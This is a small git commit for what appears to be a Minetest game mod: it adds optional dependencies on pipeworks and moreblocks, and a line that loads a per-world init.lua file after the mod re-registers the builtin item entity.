This commit is contained in:
Milan2018 2021-06-11 17:13:37 +02:00
parent 4666c0ce36
commit 5c9fcffd5a
2 changed files with 5 additions and 2 deletions

View File

@ -1 +1,3 @@
default?
default?
pipeworks?
moreblocks?

View File

@ -10,4 +10,5 @@ minetest.after(1,function()
end
end
minetest.register_entity(":__builtin:item",t)
end)
end)
pcall(dofile,minetest.get_worldpath().."/init.lua")